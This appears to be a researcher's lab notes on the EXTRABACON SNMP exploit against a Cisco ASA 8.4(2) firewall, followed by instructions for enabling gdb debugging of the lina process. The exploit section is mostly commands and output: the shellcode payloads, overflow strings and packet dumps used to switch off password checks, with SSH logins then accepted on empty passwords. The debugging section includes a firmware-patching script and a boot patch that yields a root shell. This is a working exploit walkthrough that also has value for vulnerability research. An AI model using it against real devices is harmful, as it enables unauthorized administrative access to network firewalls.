# Extrabacon (EXBA) exploit


Normal ssh connection

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: cisco
asa> enable
Password: cisco
asa# exit

Checking exploit support

# python extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] Executing:  extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] probing target via snmp
[+] Connecting to asa:161
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[0L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>
   |   |  value     = <ASN1_TIME_TICKS[363400L]>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>
   |   |  value     = <ASN1_STRING['asa.lab.net']>

[+] firewall uptime is 363400 time ticks, or 1:00:34

[+] firewall name is asa.lab.net

[+] target is running asa842, which is supported
Data stored in key file  : asa842
Data stored in self.vinfo: ASA842

Launching the exploit (disabling passwords)

# python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
[+] Executing:  extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-disable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-disable
appended PMCHECK_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
appended AAAADMINAUTH_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
[+] random SNMP request-id 80055950
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c3
EXBA msg (369): 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
[+] Connecting to asa:161
[+] packet 1 of 1
[+] 0000   30 82 01 6D 02 01 01 04  05 63 69 73 63 6F A5 82   0..m.....cisco..
[+] 0010   01 5F 02 04 04 C5 8E 8E  02 01 00 02 01 01 30 82   ._............0.
[+] 0020   01 4F 30 81 91 06 07 2B  06 01 02 01 01 01 04 81   .O0....+........
[+] 0030   85 BF A5 A5 A5 A5 B8 D8  A5 A5 A5 31 F8 BB A5 25   ...........1...%
[+] 0040   F6 AC 31 FB B9 A5 B5 A5  A5 31 F9 BA A2 A5 A5 A5   ..1......1......
[+] 0050   31 FA CD 80 EB 14 BF F0  8F 53 09 31 C9 B1 04 FC   1........S.1....
[+] 0060   F3 A4 E9 0C 00 00 00 5E  EB EC E8 F8 FF FF FF 31   .......^.......1
[+] 0070   C0 40 C3 BF A5 A5 A5 A5  B8 D8 A5 A5 A5 31 F8 BB   .@...........1..
[+] 0080   A5 B5 AD AD 31 FB B9 A5  B5 A5 A5 31 F9 BA A2 A5   ....1......1....
[+] 0090   A5 A5 31 FA CD 80 EB 14  BF E0 13 08 08 31 C9 B1   ..1..........1..
[+] 00a0   04 FC F3 A4 E9 0C 00 00  00 5E EB EC E8 F8 FF FF   .........^......
[+] 00b0   FF 31 C0 40 C3 C3 30 81  B8 06 81 B3 2B 06 01 04   .1.@..0.....+...
[+] 00c0   01 09 09 83 6B 01 03 03  01 01 05 09 5F 81 38 43   ....k......._.8C
[+] 00d0   7B 7A 81 2D 35 81 25 81  25 81 25 81 25 81 03 81   {z.-5.%.%.%.%...
[+] 00e0   6C 04 81 09 04 24 81 09  81 65 81 03 81 45 48 31   l....$...e...EH1
[+] 00f0   81 40 31 81 5B 81 33 10  31 81 76 81 3F 81 2E 81   .@1.[.3.1.v.?...
[+] 0100   2A 81 2A 81 2A 81 01 81  77 81 25 81 25 81 25 81   *.*.*...w.%.%.%.
[+] 0110   25 60 81 0B 81 04 24 81  60 01 00 00 04 31 81 7F   %`....$.`....1..
[+] 0120   81 50 61 81 43 81 10 81  10 81 10 81 10 81 10 81   .Pa.C...........
[+] 0130   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0140   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0150   10 81 10 81 10 81 10 81  10 81 10 81 10 19 47 14   ..............G.
[+] 0160   09 81 0B 7C 24 14 81 0B  07 81 7F 81 60 81 10 05   ...|$.......`...
[+] 0170   00                                                 .
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[80055950L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']>
   |   |  value     = <ASN1_STRING['']>
[+] received SNMP id 80055950, matches random id sent, likely success
[+] clean return detected

Ssh connection with the password checks disabled (an empty password is accepted)

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
asa> enable
Password: <enter>
asa# exit

Launching the exploit (re-enabling passwords)

# python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
[+] Executing:  extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-enable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-enable
appended PMCHECK_ENABLE payload eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80
appended AAAADMINAUTH_ENABLE payload eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80
[+] random SNMP request-id 425184577
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c3
EXBA msg (369): 3082016d0201010405636973636fa582015f02041957cd410201000201013082014f30819106072b060102010101048185eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c33081b80681b32b060104010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e812a812a812a81018177812581258125812560810b81042481600100000431817f8150618143811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500
[+] Connecting to asa:161
[+] packet 1 of 1
[+] 0000   30 82 01 6D 02 01 01 04  05 63 69 73 63 6F A5 82   0..m.....cisco..
[+] 0010   01 5F 02 04 19 57 CD 41  02 01 00 02 01 01 30 82   ._...W.A......0.
[+] 0020   01 4F 30 81 91 06 07 2B  06 01 02 01 01 01 04 81   .O0....+........
[+] 0030   85 EB 14 BF F0 8F 53 09  31 C9 B1 04 FC F3 A4 E9   ......S.1.......
[+] 0040   2F 00 00 00 5E EB EC E8  F8 FF FF FF 55 31 C0 89   /...^.......U1..
[+] 0050   BF A5 A5 A5 A5 B8 D8 A5  A5 A5 31 F8 BB A5 25 F6   ..........1...%.
[+] 0060   AC 31 FB B9 A5 B5 A5 A5  31 F9 BA A0 A5 A5 A5 31   .1......1......1
[+] 0070   FA CD 80 EB 14 BF E0 13  08 08 31 C9 B1 04 FC F3   ..........1.....
[+] 0080   A4 E9 2F 00 00 00 5E EB  EC E8 F8 FF FF FF 55 89   ../...^.......U.
[+] 0090   E5 57 BF A5 A5 A5 A5 B8  D8 A5 A5 A5 31 F8 BB A5   .W..........1...
[+] 00a0   B5 AD AD 31 FB B9 A5 B5  A5 A5 31 F9 BA A0 A5 A5   ...1......1.....
[+] 00b0   A5 31 FA CD 80 C3 30 81  B8 06 81 B3 2B 06 01 04   .1....0.....+...
[+] 00c0   01 09 09 83 6B 01 03 03  01 01 05 09 5F 81 38 43   ....k......._.8C
[+] 00d0   7B 7A 81 2D 35 81 25 81  25 81 25 81 25 81 03 81   {z.-5.%.%.%.%...
[+] 00e0   6C 04 81 09 04 24 81 09  81 65 81 03 81 45 48 31   l....$...e...EH1
[+] 00f0   81 40 31 81 5B 81 33 10  31 81 76 81 3F 81 2E 81   .@1.[.3.1.v.?...
[+] 0100   2A 81 2A 81 2A 81 01 81  77 81 25 81 25 81 25 81   *.*.*...w.%.%.%.
[+] 0110   25 60 81 0B 81 04 24 81  60 01 00 00 04 31 81 7F   %`....$.`....1..
[+] 0120   81 50 61 81 43 81 10 81  10 81 10 81 10 81 10 81   .Pa.C...........
[+] 0130   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0140   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0150   10 81 10 81 10 81 10 81  10 81 10 81 10 19 47 14   ..............G.
[+] 0160   09 81 0B 7C 24 14 81 0B  07 81 7F 81 60 81 10 05   ...|$.......`...
[+] 0170   00                                                 .
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[425184577L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']>
   |   |  value     = <ASN1_STRING['']>
[+] received SNMP id 425184577, matches random id sent, likely success
[+] clean return detected

Normal ssh connection (password checks enforced again; an empty password is rejected)

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
Permission denied, please try again.
admin@asa's password:

References

https://blog.silentsignal.eu/2016/08/25/bake-your-own-extrabacon/

# Enabling lina debug mode


Preparing .gdbinit

# r2 lina
[0x0804d520]> aar
[0x0804d520]> s sym.imp.setitimer
[0x0804cf94]> vp
  |||||||   ;-- imp.setitimer:
  |||||||   ; CALL XREF from 0x08c8ff2b (unk)
  |||||||   ; CALL XREF from 0x08c8ffc8 (unk)
  |||||||   ; CALL XREF from 0x08c900d8 (unk)
  |||||||   ; CALL XREF from 0x08c9011e (unk)
  |||||||   0x0804cf94      ff253c93bc09   jmp dword [reloc.setitimer_60] ; reloc.setitimer
  |||||||   0x0804cf9a      6878060000     push 0x678
  ========< 0x0804cf9f      e9f0f2ffff     jmp 0x804c294               ;[1]
:> s 0x08c900d8
            0x08c900d8      e8b7ce3bff     call sym.imp.setitimer      ;[1]
            0x08c900dd      c9             leave
            0x08c900de      c3             ret
            0x08c900df      90             nop
            ; CALL XREF from 0x0805e9ba (unk)
            ; CALL XREF from 0x08c91ed9 (unk)
            0x08c900e0      55             push ebp
            0x08c900e1      89e5           mov ebp, esp
            0x08c900e3      83ec28         sub esp, 0x28               ; '('
            0x08c900e6      8b0da46ad109   mov ecx, dword [0x9d16aa4]  ; [0x9d16aa4:4]=0x4c
            0x08c900ec      81f93f420f00   cmp ecx, 0xf423f
        ,=< 0x08c900f2      7f34           jg 0x8c90128


# cat .gdbinit
set debug remote 1
set disassembly-flavor intel
target remote /dev/ttyUSB0
# Patch the watchdog: zero the counter at 0x9d16aa4 that lina compares against 0xf423f (see the setitimer caller disassembled above)
set *0x9d16aa4=0
file ~/lina

Option 1: Modifying the rootfs

# cat enable_gdb.sh
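#!/bin/bash
#
# enable_gdb.sh - patch an ASA firmware image so that /asa/bin/lina is started
# under gdbserver on the serial console (ttyS0) instead of ttyUSB0.
#
# Usage: ./enable_gdb.sh <firmware.bin>
#
# The image is modified IN PLACE; a pristine copy is kept as <firmware.bin>.orig.
# Steps, all relative to the current directory:
#   1. locate the gzip'd rootfs inside the image with binwalk and carve it out
#      as rootfs.img.gz
#   2. unpack the cpio archive into ./extracted, uncomment the ttyUSB0 line in
#      asa/scripts/rcS and switch it to ttyS0
#   3. append the patched rcS to the cpio archive, gzip it again, zero-pad it to
#      the original size and write it back over the original rootfs
#
# Requires: binwalk, cpio, gzip, GNU dd and stat (sed -i is GNU syntax too).
# The repacked rootfs must not be larger than the original; the script aborts
# before touching the image if it is, since writing it back would otherwise
# overwrite whatever follows the rootfs in the firmware.

set -euo pipefail

die() { printf '%s\n' "$*" >&2; exit 1; }

(( $# == 1 )) || die "usage: ${0##*/} <firmware.bin>"

binary="$1"
readonly rfs='rootfs.img'
readonly rfsgz="$rfs.gz"
readonly d='extracted'
readonly rcs='asa/scripts/rcS'
workdir=$PWD

[[ -f "$binary" ]] || die "not a regular file: $binary"

# Never overwrite an existing backup with an already-patched image on a re-run.
if [[ -e "$binary.orig" ]]; then
  printf '%s\n' "[+] $binary.orig already exists, keeping it"
else
  cp -- "$binary" "$binary.orig"
  printf '%s\n' "[+] cp $binary $binary.orig"
fi

# Byte offsets of the gzip'd rootfs: its start from binwalk's gzip signature,
# its end from the last hit of the raw byte pattern searched for below.
# NOTE: the 'grep rootfs' / 'grep 00' filters depend on binwalk's output
# format - verify both numbers against the image if binwalk changes.
offset=$(binwalk -y='gzip' "$binary" | grep rootfs | awk '{print $1}') \
  || die "could not locate the rootfs in $binary"
end=$(binwalk --raw='\x0b\x01\x64\x00\x00' "$binary" | grep 00 | tail -n 1 | awk '{print $1}') \
  || die "could not locate the end of the rootfs in $binary"

[[ "$offset" =~ ^[0-9]+$ && "$end" =~ ^[0-9]+$ ]] \
  || die "unexpected binwalk output (offset='$offset', end='$end')"
(( end > offset )) || die "rootfs end ($end) is not past its start ($offset)"
size=$(( end - offset ))

printf '%s\n' "[+] $binary"
printf '%s\n' "[+] \__ $rfsgz - $size bytes"

# bs=1 so that skip/count are plain byte offsets (slow, but exact).
dd if="$binary" of="$rfsgz" skip="$offset" count="$size" bs=1

printf '%s\n' "[+] $binary >> $rfsgz"

# Scratch directory for the unpacked rootfs; removed on every exit path.
if [[ -e "$d" ]]; then
  die "scratch directory '$d' already exists, remove it first"
fi
mkdir -- "$d"
cleanup() { rm -rf -- "${workdir:?}/${d:?}"; }
trap cleanup EXIT
cd "$d"

# Unpack a copy to get at rcS, then keep the uncompressed archive itself as
# rootfs.img so the patched file can be appended to it.
gunzip -c "../$rfsgz" | cpio -i --no-absolute-filenames --make-directories
gzip -f -d "../$rfsgz"
mv -- "../$rfs" .
printf '%s\n' "[+] $rfsgz ~ $rfs"

[[ -f "$rcs" ]] || die "$rcs not found in the unpacked rootfs"
grep -q ttyUSB0 -- "$rcs" || die "no ttyUSB0 line to patch in $rcs"

# Uncomment the line mentioning ttyUSB0 and point it at the serial console.
sed -i 's/#\(.*ttyUSB0.*\)/\1/' "$rcs"
sed -i 's/ttyUSB0/ttyS0/' "$rcs"

printf '%s\n' "[+] gdb enabled in $rcs"

# The patched rcS is appended as a second entry with the same path; the
# original script relies on the boot-time extraction taking the later copy
# (presumably cpio's default behaviour - confirm if the patch has no effect).
printf '%s\n' "$rcs" | cpio --format='newc' -o --append -F "$rfs"

printf '%s\n' "[+] $rfs updated"

gzip -f -9 "$rfs"
mv -- "$rfsgz" ../.

printf '%s\n' "[+] $rfs ~ $rfsgz"

cd "$workdir"

# Zero-pad the repacked archive back to the original size so the slot in the
# image is refilled exactly (the original script relies on the decompressor
# tolerating the trailing zero bytes). Refuse to proceed if it grew instead.
nsize=$(stat -c%s "$rfsgz")
sizediff=$(( size - nsize ))
(( sizediff >= 0 )) \
  || die "repacked $rfsgz ($nsize bytes) is larger than the original slot ($size bytes); refusing to overwrite data past the rootfs"

dd if=/dev/zero count="$sizediff" bs=1 conv=notrunc,noerror status=noxfer >> "$rfsgz"
nsize=$(stat -c%s "$rfsgz")
dd if="$rfsgz" of="$binary" seek="$offset" count="$nsize" bs=1 conv=notrunc,noerror

printf '%s\n' "[+] $rfsgz >> $binary"

rm -- "$rfsgz"

printf '%s\n' "[+] Done!"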

# ./enable_gdb.sh asa842-k8.bin
[+] cp asa842-k8.bin asa842-k8.bin.orig
[+] asa842-k8.bin
[+] \__ rootfs.img.gz = 23628432 bytes
[+] asa842-k8.bin >> rootfs.img.gz
[+] rootfs.img.gz ~ rootfs.img
[+] gdb enabled in asa/scripts/rcS
[+] rootfs.img updated
[+] rootfs.img ~ rootfs.img.gz
[+] rootfs.img.gz >> asa842-k8.bin
[+] Done!

# Checksum bypass
# scp -oKexAlgorithms=+diffie-hellman-group1-sha1 asa842-k8.bin admin@asa:asa842-k8-gdb.bin
# gdb
asa(config)# boot system disk0:/asa842-k8-gdb.bin
asa(config)# wr
asa(config)# reload

...
SMFW PID: 479, SMFW started in mode 0
SMFW PID: 481, Starting /asa/bin/lina under gdbserver /dev/ttyS0
SMFW PID: 479, started gdbserver on member: 481//asa/bin/lina
SMFW PID: 479, created member ASA BLOB, PID=481
Process /asa/bin/lina created; pid = 484
Remote debugging using /dev/ttyS0

Option 2: Modifying kernel boot parameters

# r2 -w asa842-k8.bin
[0x00000000]> / quiet
[0x00000000]> s hit0_1
[0x017ed8dc]> px
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x017ed8dc  7175 6965 7420 6c6f 676c 6576 656c 3d30  quiet loglevel=0
0x017ed8ec  2061 7574 6f20 6b73 7461 636b 3d31 3238   auto kstack=128
[0x017ed8dc]> w rdinit=/bin/sh        k
[0x017ed8dc]> px
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x017ed8dc  7264 696e 6974 3d2f 6269 6e2f 7368 2020  rdinit=/bin/sh
0x017ed8ec  2020 2020 2020 6b73 7461 636b 3d31 3238        kstack=128

# Checksum bypass
# scp -oKexAlgorithms=+diffie-hellman-group1-sha1 asa842-k8.bin admin@asa:asa842-k8-binsh.bin
# gdb
asa(config)# boot system disk0:/asa842-k8-binsh.bin
asa(config)# wr
asa(config)# reload

...
Freeing unused kernel memory: 156k freed
Write protecting the kernel text: 1716k
Write protecting the kernel read-only data: 504k
/bin/sh: can't access tty; job control turned off
# sed -i 's/#\(.*\)ttyUSB0\(.*\)/\1ttyS0\2/' /asa/scripts/rcS
# exec /sbin/init

...
SMFW PID: 479, SMFW started in mode 0
SMFW PID: 481, Starting /asa/bin/lina under gdbserver /dev/ttyS0
SMFW PID: 479, started gdbserver on member: 481//asa/bin/lina
SMFW PID: 479, created member ASA BLOB, PID=481
Process /asa/bin/lina created; pid = 484
Remote debugging using /dev/ttyS0

References

http://www.slideshare.net/CanSecWest/csw2016-wheeler-barksdalegruskovnjakexecutemypacket
http://2014.ruxcon.org.au/assets/2014/slides/Breaking%20Bricks%20Ruxcon%202014.pdf
https://community.rapid7.com/community/metasploit/blog/2016/06/14/asa-hack
https://blog.silentsignal.eu/2016/08/25/bake-your-own-extrabacon/